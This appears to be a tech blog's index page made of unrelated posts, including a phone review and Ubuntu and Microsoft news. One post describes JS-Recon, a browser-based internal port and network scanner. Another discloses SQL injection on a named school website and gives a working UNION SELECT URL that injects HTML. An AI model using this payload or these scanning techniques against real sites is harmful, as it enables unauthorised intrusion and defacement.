JS Recon - javascript based port scanner and detector

site: http://www.andlabs.org/tools/jsrecon.html

What is JS-Recon?

JS-Recon is a network reconnaissance tool written in JavaScript by making use of HTML5 features like Cross Origin Requests(CORs) and WebSockets

Currently supported functionality:

• Port Scans
• Network Scans
• Detecting private IP address

Supported Browsers:

It works on the latest versions of Chrome, Safari and Firefox that support CORs and WebSockets.

Use it on Chrome and Safari for best results. Firefox throws exceptions sometimes when scanning through COR, not sure why this happens. Scans using WebSockets work properly though.

Currently it has been tested only on Windows XP and Win7 systems. Behavior could differ on Linux and Mac

How does it work?:

Cross domain XHR has five possible readystate statuses and WebSocket has four possible readystate statuses. When a new connection is made to any service the status of the readystate property changes based on the state of the connection. This transition between different states can be used to determine if the remote port to which the connection is being made is either open, closed or filtered.

* Port Scanning:

When a WebSocket or COR connection is made to a specific port of an IP address in the internal network the initial state of WebSocket is readystate 0 and for COR its readystate 1. Depending on the status of the remote port, these initial readystate statuses change sooner or later. The below table shows the relation between the status of the remote port and the duration of the initial readystate status. By observing how soon the initial readystate status changes we can identify the status of the remote port.

There are some limitations to performing port scans this way. The major limitation is that all browser’s block connections to well known ports and so they cannot be scanned. The other limitation is that these are application level scans unlike the socket level scans performed by tools like nmap. This means that based on the nature of the application listening on a particular port the response and interpretation might vary.

There are four types of responses expected from applications:

1. Close on connect: Application terminates the connection as soon as the connection is established due to protocol mismatch
2. Respond & close on connect: Similar to type-1 but before closing the connection it sends some default response
3. Open with no response: Application keeps the connection open expecting more data or data that would match its protocol specification
4. Open with response: Similar to type-3 but sends some default response on connection, like a banner or welcome message

The behavior of WebSockets and COR for each of these types is shown in the table below.

* Network Scanning:

The port scanning technique can be applied to perform horizontal network scans of internal networks. Since both an open port and a closed port can be accurately identified, horizontal scans can be made for specific ports that would be allowed through the personal firewalls of most corporate systems.

Identification of an open or closed port would indicate that a particular IP address is up.

Ports like 445 or 3389 are ideal for such purpose as these are usually allowed across personal firewalls of desktop systems. It has been found that port 445 is of Application type-1 on Windows 7 and can be detected whether it is open or closed. However port 445 on Windows XP and port 3389 are of application type-3 and the host can only be detected if these ports are closed on such systems.

* Detecting Private IP Address:

Most home user’s connected to WiFi routers are given IP addresses in the 192.168.x.x range. And the IP address of the router is often 192.168.x.1 and they almost always have their administrative web interfaces running on port 80 or 443.

These two trends can be exploited to guess the private IP address of the user in two steps:

Step 1: Identify the user’s subnet 
This can be done by scanning port 80 and/or 443 on the IP addresses from 192.168.0.1 to 192.168.255.1. If the user is on the 192.168.3.x subnet then we would get a response for 192.168.3.1 which would be his router and thus the subnet can be identified. 

Step 2: Identify the IP address 
Once the subnet is identified we scan the entire subnet for a port that would be filtered by personal firewalls, port 30000 for example. So we iterate from 192.169.x.2 to 192.168.x.254, when we reach the IP address of the user we would get a response (open/closed) because the request is generated from the user’s browser from within his system and so his personal firewall does not block the request.

Limitations:

Blocked Ports:
To avoid Cross Protocol exploitation almost all popular browsers block connections to certains well known ports. Due to this the status of these ports cannot be determined.

Linear Scanning:
The determination of port status is based on timing of the readyState status changes. Opening multiple simultaneous connections interferes with this timing leading to unreliable results. Hence to avoid such situations all scans are performed one port at a time.

Internal Networks Only:
As stated above, timing is critical to identification of port status. Depending on the location of the target device this timing could vary. JSRecon has been tuned to scan internal networks with very low turn around time. Scanning external networks would require only two minor changes - values of the variables open_port_max and closed_port_max must be suitable updated.

Read more »

Ubuntu Developer Week 2011: February 28th - March 4th

The Ubuntu Developer Week event will take place from February 28th to
March 4th, 2011, and will cover several aspects of Ubuntu development,
from crash-courses in getting started with working on Ubuntu to more
advanced topics.

Join #ubuntu-classroom on irc.freenode.net from 28th Feb to 4th Mar
and check out https://wiki.ubuntu.com/UbuntuDeveloperWeek for more
information.

Ubuntu developers and enthusiasts wanting to contribute will get
together online for five days of sessions hosted by some of Ubuntu's
greatest developers.

Here are some of the topics the developers will go over in the sessions:

· Getting Started with Ubuntu Development;
· How to use Ubuntu Distributed Development;
· How to get changes into Ubuntu;
· How to make changes in stable releases of Ubuntu;
· How to collaborate with Debian;
· Getting new apps into Ubuntu;
· Unity hacking (fixing Unity bugs, writing compiz plugins, learning libunity);
· Ubuntu One App Programme;
· Hooking in Ubuntu translations;
· How to write IRC bots;
· How to use Zeitgeist;
· How to use TestDrive;
· Ubuntu 11.04 stuff: Unity 2D, OMAP4 and ARM, Q&A with Ubuntu
Engineering Director, etc;
· Helping out the LoCo Directory;
· Django hacking;
· How to get better bug reports;
· Boto EC2 Cloud API;
· How to use Launchpad’s Daily Builds;
· and much more!

To participate, all you have to do is join the #ubuntu-classroom
channel on irc.freenode.net. Sessions start Monday, February 28th,
2011 at 16:00 UTC. The odd hour was chosen to accommodate for as many
people from around the world as possible.

The main channel will be in English, to ensure that the highest number
of people can join, but there will be translations in several
languages for those who aren't comfortable enough with their English
to ask questions. Translations include: German, French, Italian,
Catalan, Finnish, Danish and Spanish.

In only 5 years, Ubuntu has become the most popular Linux-based
operating system in the world with millions of users. Did you ever
wondered how the Ubuntu development works? Do you want to know how to
get involved yourself? You can get more information about Ubuntu
Developer Week here.

Read more »

Nokia C3-01 Touch and Type (Unlocked)

Nokia's C3-01 Touch & Type has a clumsy name, but it's a darn useful cell phone. It's a standard candy bar style handset with a numeric keypad, except that it also has a large (for its size) touch screen. At just $179—inexpensive for an unlocked device—the Nokia C3-01 offers plenty of power for world travelers, or anyone who wants a svelte device that works with AT&T, T-Mobile, or prepaid SIM cards. That makes it our new Editors' Choice for unlocked cell phones.

Design and Call Quality
The Nokia C3-01 Touch & Type looks and feels classy. It measures 4.4 by 1.9 by 0.4 inches (HWD) and weighs 3.5 ounces. The aluminum housing and tapered battery cover make the C3-01 comfortable to hold for long periods. My test model was silver; a charcoal gray version is also available. The 2.4-inch, plastic resistive touch screen sports 240-by-320-pixel resolution. Unlike the larger Nokia C6 ($249, 2.5 stars), the C3's screen was accurate and responsive to my touches. The numeric keypad features large but heavily recessed keys. Dialing numbers felt a bit stiff, but I got used to it quickly.

The Nokia C3-01 is a quad-band EDGE (850/900/1800/1900 MHz) and quad-band HSDPA 10.2 (850/900/1900/2100) device with 802.11b/g/n Wi-Fi. That makes it perfect for overseas travel, as the C3-01 can hit high-speed data networks both here and in many other countries. I tested the C3 with an AT&T SIM; a T-Mobile SIM will work fine, but you'll be limited to 2G speeds in the U.S.

Call quality was okay, but not great in my tests. Callers said my voice sounded about average through the C3-01's tiny microphone. On my side of the call, voices sounded muffled and distant, and there wasn't enough gain for noisier offices even with the volume maxed out. Reception was average. Calls sounded clear through an Aliph Jawbone Icon ($99, 4 stars) Bluetooth headset. There's no voice dialing of any kind, Bluetooth or otherwise. The speakerphone sounded clear and full, although it didn't go quite as loud as I would have liked. Battery life was average at 4 hours and 41 minutes of talk time.

Operating System and Apps
The Series 40 6th Edition OS is easy enough to get around, and isn't the complex nightmare that Series 60 has become over the years. The well-calibrated touch screen only helps matters. Nokia doesn't publish a CPU spec for the C3-01, but the phone feels much more responsive than the admittedly more ambitious Nokia C6 does.

Otherwise, you get a fairly standard software complement for a Series 40 phone. Nokia's WebKit browser is a newer addition, and it's pretty usable, but the low screen resolution and small size mean that you're better off sticking with WAP pages. There are built-in Nokia Messaging e-mail, IM, and threaded SMS apps. All are reasonably powerful, but considering the phone's numeric keypad, the "Type" portion of the C3-01's name is a bit of a stretch. Get something with a QWERTY keyboard or larger touch screen if you plan on handling a lot of e-mail. There's also no GPS, so keep that in mind.

Multimedia, Camera, and Conclusions
The standard-size 3.5-mm headphone jack is welcome. Nokia buried the microSD card slot underneath the battery cover, but accessing it was easy enough; my 32GB SanDisk card worked fine. There is only 23MB of free internal memory. Music tracks sounded clear and full over Motorola S9-HD Bluetooth headphones ($129, 3.5 stars). The music player was fun to use and displays large album art thumbnails. There's also an FM radio. There are no options to buy music over the air, but that's not a huge loss. Standalone videos played smoothly in full-screen mode and looked sharp, although the 2.4-inch LCD is a limiting factor for video playback.

The 5-megapixel camera comes with an LED flash, though it lacks auto-focus. Test photos looked very good: sharp, natural, and well lit both indoors and out. Shutter speeds were fast, and it was easy to navigate the camera's various settings. Nokia includes image rotation, color, and contrast controls for some basic on-device photo editing. Recorded 640-by-480-pixel videos were a little jerky at 15 frames per second, but they were usable.

All told, the Nokia C3-01 Touch & Type is a great second phone for use overseas, or for anyone that doesn't like being tied to a contract here in the U.S. The Sony Ericsson Naite ($149, 4 stars) is still a fine choice, and it's $30 cheaper. But you lose the touch screen and standard-size headphone jack, and the Naite doesn't have nearly as good a camera as the Nokia C3-01. If you want a QWERTY keyboard, the Nokia E5 ($229, 3 stars) offers a pretty comfortable one, plus GPS, and its Series 60 OS makes it a real smartphone that runs thousands of third-party apps. It also lacks a touch screen, though, and it's made of plastic instead of aluminum. Worse, the OS is a lot more complicated; existing Symbian fans will take to the E5, but everyone else will have an easier time with the C3-01.

Benchmarks
Continuous talk time: 4 hours 41 minutes

Read more »

bug found at tvs lakshmi school website !!!!!

[update]:
I have sent a mail to tvsmhss@tvslvs.com regarding this vulnerability and asked them to rectify it .



 
Hi t3ch viewers , i recently came across a bug at tvs lakshmi school website ...

It has xss and sqli bugs and all its major databases are visibile making it more vulnerable for hacking .

details :

site name: www.tvsmhss.org

bug :sqli

no of columns:7

visible text: 2 and 4 

proof and demo:

to veiw proof and demo of the bug click the below link

http://www.tvsmhss.org/bulletinnews.php?id=-1%20union%20select%201,concat(0x52,0x65,0x63,0x65,0x6E,0x74,0x20,0x6E,0x65,0x77,0x73,0x20,0x66,0x72,0x6F,0x6D,0x20,0x74,0x68,0x65,0x20,0x73,0x63,0x68,0x6F,0x6F,0x6C,0x3A,0x0A,0x3C,0x68,0x31,0x3E,0x54,0x68,0x69,0x73,0x20,0x77,0x65,0x62,0x73,0x69,0x74,0x65,0x20,0x68,0x61,0x73,0x20,0x78,0x73,0x73,0x20,0x61,0x6E,0x64,0x20,0x73,0x71,0x6C,0x69,0x20,0x62,0x75,0x67,0x73,0x20,0x2E,0x2E,0x20,0x3A,0x28,0x20,0x2E,0x2E,0x0A,0x42,0x75,0x67,0x20,0x66,0x6F,0x75,0x6E,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2E,0x2E,0x3C,0x62,0x72,0x2F,0x3E,0x0A,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x63,0x6C,0x69,0x63,0x6B,0x20,0x68,0x65,0x72,0x65,0x20,0x74,0x6F,0x20,0x67,0x6F,0x20,0x74,0x6F,0x20,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E),3,4,5,6,7--

Read more »

Video server for e-lectures goes online

Union HRD Minister Kapil Sibal Thursday inaugurated the video server for National Programme on Technology Enhanced Learning (NPTEL) that will upload thousands of web-based lectures to make them accessible to university and college students.

The server, located at IIT Madras and connected to the 1Gbps link of National Knowledge Network and 155 Mbps link of Colleges’ Virtual Private Network, will enable more than 250 universities and about 11,000 colleges to download e-content. Earlier, a Goggle was being used for uploading the lectures.

Pointing out that the server would be the largest such repository of web-based lectures in the world, Sibal said the challenge now was to ensure the content created was interesting and enriching for students.

NPTEL is India’s largest technical knowledge dissemination programme, running 125 courses in web format and 135 in video format.

Read more »

change dns to speed up resolution and net speed .

DNS stands for domain name resolution , in simpler words it refers
 to conversion of a URI into IP addresss i.e www.google.com gets
 converted into 74.125.227.51 , so that your computer
 can communicate with this ip address to load the page
 . severs called DNS helps us in this url to ip conversion , usually the dns server will be automatically provided by your isp through dhcp while connecting to internet , these dns server provided by your isp may be slow and some times gets busted , so might reduce your net speed slighty , to solve this you can change your dns server of your computer to point to free and fast open source dns server , ie open dns ..

to set up your computer for open follow the following instruction according to your os .

https://store.opendns.com/setup/computer/

Read more »

office web apps by Microsoft India

Microsoft Office Web Apps has been launched in India. Web Apps is Microsoft's equivalent of Google Docs, which lets users create, access, edit, and share documents from the Office suite, which includes Excel, Word, PowerPoint, and OneNote, from any PC equipped with an Internet connection. The best part is that the service is absolutely free.

"Office Web Apps are a key piece of Microsoft's overall cloud strategy. Features like ease of sharing and high document fidelity make Office Web Apps a powerful enabler of productivity in the cloud for modern information workers and consumers alike. Moreover, this tool helps students collaborate on their school and college projects in a seamless way," said Sanjay Manchanda, Director, Microsoft Business Division.

All you need to run Office Web Apps is a Windows Live ID on SkyDrive or Hotmail to access Microsoft Office Web Apps from any of the supported web browsers like Internet Explorer 7 or later, Mozilla Firefox 3.5 or later, Google Chrome and Safari 4. The documents ported to and fro retain their style, formatting, embedded objects like images, and other meta objects. Office Web Apps is a boon for creating and maintaining collaborative documents, and features interoperability between the PC and Mac platforms.

Read more »